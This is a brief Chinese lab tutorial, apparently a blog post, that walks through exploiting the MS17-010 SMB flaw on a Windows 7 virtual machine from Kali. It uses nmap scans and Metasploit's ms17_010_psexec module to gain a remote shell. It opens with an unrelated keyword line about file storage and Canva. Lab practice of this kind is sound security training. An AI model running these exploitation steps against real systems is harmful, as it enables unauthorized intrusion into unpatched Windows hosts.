网站上传文件存储方式在线设计平台canva
1.环境准备
kali攻击机
win7靶机
1、将网络都设置为NAT模式
2、win7的防火墙关闭
3、win7启动445端口(开启smb服务)
2.探测主机ip
nmap -sP 192.168.19.0/24
由此可知目标靶机ip:192.168.19.132
3.扫描ip端口开放
nmap -F 192.168.19.132
4.确定445端口开启,下一步打开msf平台
msfconsole
5.搜索ms17_010漏洞
search ms17_010
6.利用exploit
use exploit/windows/smb/ms17_010_psexec
options
7.设置rhosts(目标ip)
set rhosts 192.168.19.132
run
8.成功利用漏洞,可进入shell,cmd,下一步操作
此时看到乱码,很正常,基本到这就结束了
9.验证
在kali上输入指令win7上就自启动打开百度网站了